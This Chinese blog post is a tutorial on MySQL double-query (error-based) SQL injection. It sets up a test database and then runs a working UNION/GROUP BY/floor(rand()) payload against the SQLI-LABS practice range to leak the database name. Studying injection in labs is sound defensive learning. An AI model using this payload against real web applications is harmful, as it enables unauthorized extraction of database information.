mysql error 1_MYSQL双查询错误1

最新推荐文章于 2022-08-02 18:31:38 发布
最新推荐文章于 2022-08-02 18:31:38 发布
阅读量150 收藏
点赞数
文章标签: mysql error 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39883194/article/details/113164430
版权

一、基础知识

开始讲解MYSQL双查询错误之前,我们先了解一下双查询语句以及需要使用到的几个数据库函数和GROUP BY语句

1. 双查询语句

先了解一下什么是子查询,子查询就是嵌入第一层select语句中的select语句,比如:

SELECT * FROM score WHERE even_id IN (SELECT even_id FROM grade_event WHERE category = 'T');

功能:该语句实现的是找出与考试类别('T')相对应的所有考试事件行的ID,然后利用它们来查找那些考试的成绩

双查询语句就是此类使用了两个select的查询语句

2. 数据库函数和GROUP BY语句

1)rand() --- 随机数生成函数

2)floor() --- 向下取整函数

3)concat()  --- 字符串连接函数

4)count() --- 统计函数

5)group by --- 给出分组条件

二、环境搭建

(1)创建数据库create databaseinjection;

(2)创建表create table user(

idint,

namevarchar(15)

);

(3)往表中插入3条数据insert into user value(1,'mike');insert into user value(2,'anna');insert into user value(3,'andy');

数据库版本:mysql-5.7.27

三、查询操作

1. SQL语句

select count(*), concat((select database()), floor(rand()*2)) as a from user group by a;

2. 执行情况

1b26896f4baaa5601c9a73125c729c78.png

3. 操作结果

可以看到在第二次执行我们的SQL语句时发生了错误,从错误提示中我们获知了数据库的名字:injection.

四、靶场测试

下面我们利用SQLI-LABS这个SQL注入靶场做一次利用SQL双查询错误进行注入攻击,地址如下:

在上面的网址后加入:

?id=1‘ union select 1, count(*), concat((select database()), floor(rand()*2)) as a from information_schema.tables group by a --+

也许是运气好,第一次执行就得到了想要的结果,如下:

1b613f1f615cb29c9946555cef0005fe.png

从上图中可以看出,我们已经得到了数据库的名字:security. 接下来可以一步一步构造要注入的SQL语句获取信息,在下

一篇讲解双查询错误原理后,会讲解如何构造注入语句来获取数据库信息.

weixin_39883194
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
win10下MySQL报错解决——ERROR 1 (HY000): Can‘t create/write to file ‘XXX‘ (Errcode: 13 - Permission
liucan2010leo的博客
07-13 1183
这里写自定义目录标题 https://www.cnblogs.com/Braveliu/p/11458901.html解决方法见此链接。但此文针对的是linux。 在win10下,最后要把文件夹的斜杠改一下。 即select * from tmptwo100 into outfile 'C:/ProgramData/MySQL/MySQL Server 5.7/Data/tmptwo100.xls'; 文件夹目录前面的参照show variables like 'datadir';得出的目录名,只是把斜杠
mysql错误1
cookieBear_的博客
06-22 188
MySQL:Error Code: 1452. Cannot add or update a child row: a foreign key constraint fails (shop.itemdetails, CONSTRAINT FK_CategoryId FOREIGN KEY (CategoryId) REFERENCES product_category (Category_ID)) 这句话的意思是: 你添加一个值作为一个外键,但是这个外键不在相关联的数据库中的主键中,这样就导致了添加失败,自
MySQL报错-1
qq_47255712的博客
06-30 933
MySQL报错-1 error: The server quit without updating PID file(…) 转载于:https://javawind.net/p141 原因分几种: 1.错误日志目录不存在 解决方法:使用“chown” “chmod”命令赋mysql 所有者及权限。 2.可能是/home/data/mysql 文件夹没有写的权限 解决方法 :给予权限,执行 “chown -R mysql:mysql /home/data/mysql” “chmod -R 755 /hom
mysql error笔记1
weixin_38168547的博客
07-05 85
mysql视图问题: The user specified as a definer ('root'@'%') does not exist 原因:由于root用户对全局host无访问权限,给root用户添加一个访问权限即可。 解决: 用登录命令: mysql -u root -pPWD 登陆mysql 后,执行: grant all privileges o...
mysql数据库插入中文时出现ERROR 1…
weixin_30502157的博客
11-22 123
数据库插入中文时出现ERROR 1366 (HY000): Incorrect string value: '\xCD\xF5\xC 解决方法: 在mysql安装目录中有个my.ini文件 default-character-set=utf8 改为 default-character-set=gb2312 保存退出后问题解决 这个问题也会导致你通过php...
Mysql ERROR 1577错误解决方法
09-10
MySQL中的ERROR 1577错误通常出现在MySQL服务器升级之后,这是由于系统表在新版本中发生了变化,而旧版本的系统表结构未得到更新,导致的问题。此错误的完整信息是“ERROR 1577 (HY000): Cannot proceed because ...
mysql_ZH_error.go
11-25
mysql错误简易中文提示
mysql.rar_MySQL Visual C++_MySql查询_c语言mysql_mysql c语言_mysql操作
09-24
在本文中,我们将深入探讨如何使用C语言来操作MySQL数据库,包括查询和各种基本操作。 首先,要使用C语言连接MySQL,你需要包含MySQL的C API头文件,并链接MySQL的动态库。在C语言程序中,你可以使用以下代码来初始...
MySQL ERROR 2013 (HY000)错误解决方法
09-10
主要介绍了MySQL ERROR 2013 (HY000)错误解决方法,错误提示全文ERROR 2013 (HY000): Lost connection to MySQL server at 'reading initial communication packet', system error: 104,需要的朋友可以参考下
MySQL.rar_MYSQL_mysql vc_vc mysql
09-24
4. **错误处理**:在执行数据库操作时,需要检查返回的错误码或使用`mysql_error()`获取错误信息,以确保程序的健壮性。 5. **事务处理**:对于需要原子性和一致性的操作,可以使用开始事务(`START TRANSACTION`)、...
mysql 错误代码1_mysql常见错误代码解析
weixin_30227789的博客
02-07 937
145 :文件无法打开。1005:MYSQL创建表失败1006:MYSQL创建数据库失败1007:MYSQL数据库已存在,创建数据库失败1008:MYSQL数据库不存在,删除数据库失败1009:MYSQL不能删除数据库文件导致删除数据库失败1010:MYSQL不能删除数据目录导致删除数据库失败1011:MYSQL删除数据库文件失败1012:MYSQL不能读取系统表中的记录1060:字段重复,导致无...
MySQL数据导出:ERROR 1 (HY000) 错误解决
zqzwzd的博客
11-29 4371
  问题: 导出数据库文件: select * into outfile '/ziqiMysqlFile/out.csv' fields terminated by ',' from goods; 报error: ERROR 1 (HY000): Can't create/write to file '/ziqiMysqlFile/out.csv' (OS errno 13 - Permi...
MySQL Error
ses19830419的专栏
05-10 757
130 :文件格式不正确。(还不是很清楚错误的状况)   145 :文件无法打开。   1005:创建表失败。   1006:创建数据库失败。   1007:数据库已存在,创建数据库失败。
#mysql错误01#
weixin_38626872的博客
08-02 231
现象:mysql 查询出现 "this is incompatible with sql_mode=only_full_group_by"错误解决方案。mysql 5.7版本默认的sql配置是:sql_mode="ONLY_FULL_GROUP_BY",这个配置严格执行了"SQL92标准"。修改mysql配置文件,通过手动添加sql_mode的方式强制指定不需要ONLY_FULL_GROUP_BY属性,my.cnf位于etc文件夹下,vim下光标移到最后,添加如下:vim /etc/mysql.cnf。..
Mysql ERROR 1 (HY000): Can't create/write to file
Silver_sail的专栏
11-09 6721
问题起因:使用 MySQL 语句的 INTO OUTFILE时出现。 问题现象:ERROR 1 (HY000): Can't create/write to file '/data/outfile.csv' (Errcode: 13) 解决办法: 1,:chmod 1777 ***   【***是要更改权限的文件目录】      试一下上面的命令时候还是报错。要是还是报
MySQL into outfile 问题解决:ERROR 1 (HY000): Can't create/write to file
困而学之,学思并重
12-15 6737
任务:从MySQL导数据导出数据到本地——select * into outfile '/home/spark/data.csv' fields terminated by ',' lines terminated by '\n' from mytable; 错误信息:ERROR 1 (HY000): Can't create/write to file '/home/spark/data.csv'
MySQL的Warning:1366问题
KurlKas
01-18 1751
flask中向mysql中数据操作会出现字符集的问题,比如创建数据模型:db.create_all()时,控制台会出现warring 1366 的字符集警告,是这样的:这个异常是mysql问题,而非python的问题,这是因为mysql的字段类型是utf-xxx, 而在mysql中这些utf-8数据类型只能存储最多三个字节的字符,而存不了包含四个字节的字符。解决方法:修改mysql数据表的字段类型
mysql errno 1_mysql从库 Last_SQL_Errno: 1 的错误的解决过程
weixin_32572673的博客
01-19 389
Last_SQL_Errno: 1Last_SQL_Error: Unable to use slave's temporary directory /tmp - Can't create/write to file '/tmp/SQL_LOAD-955cf212-bd60-11e7-8698-d0946601b0e9' (Errcode: 13 - Permission denied)从库缓存 ...
mysql的select 1
mywaya2333的博客
02-12 1979
前两天在公司项目中看到有人在一个子查询中写了select 1,然后就很好奇这个写法的作用,通过网上各位大佬的介绍,得知select 1在作为子查询中的判断子查询结果是否存在条件时效率较高(大量数据情况下)。 用法示例 teacher表: teachercard表: 使用的sql语句如下: select * from teachercard tc where exists (select 1 from teacher t where t.dd is not null); 1 sql.
mysql error 11_mysql Unable to lock ./ibdata1, error: 11
最新发布
06-12
这个错误通常表示 MySQL 在尝试锁定数据文件时遇到了问题。可能的原因包括: 1. 数据文件所在的磁盘空间已满,导致 MySQL 无法将其锁定。 2. 数据文件已经被其他进程锁定,导致 MySQL 无法访问它。 3. 数据文件所在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值